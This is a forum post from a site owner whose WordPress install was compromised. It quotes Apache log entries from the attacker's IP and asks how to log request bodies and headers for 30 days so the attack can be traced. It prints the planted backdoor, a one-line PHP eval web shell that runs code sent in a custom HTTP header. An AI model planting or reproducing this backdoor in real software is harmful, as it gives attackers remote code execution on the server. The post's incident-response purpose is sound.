ozzWANTED
Verified User
- Joined
- Mar 10, 2015
- Messages
- 45
Hi,
In apache access log I see things like that:
And in hacked file there is the following:
So I don't see nor the curl, not the _POST content, not the _SERVER.
I want to be able to log all this for 30 days. How to do that. As now we cannot uncover exact attack pattern done by the hacker.
In apache access log I see things like that:
Apache config:
185.10.68.183 - - [30/Jun/2020:04:04:21 +0300] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 5495 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
185.10.68.183 - - [30/Jun/2020:04:04:24 +0300] "GET /wp-admin/wp-update.php HTTP/1.1" 200 3889 "-" "curl/7.64.0"
185.10.68.183 - - [30/Jun/2020:04:04:24 +0300] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 5557 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
185.10.68.183 - - [30/Jun/2020:04:04:27 +0300] "GET /wp-admin/wp-update.php HTTP/1.1" 200 7320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
And in hacked file there is the following:
PHP:
<?php @eval($_SERVER['HTTP_33C5119052D55684']); ?>
I want to be able to log all this for 30 days. How to do that. As now we cannot uncover exact attack pattern done by the hacker.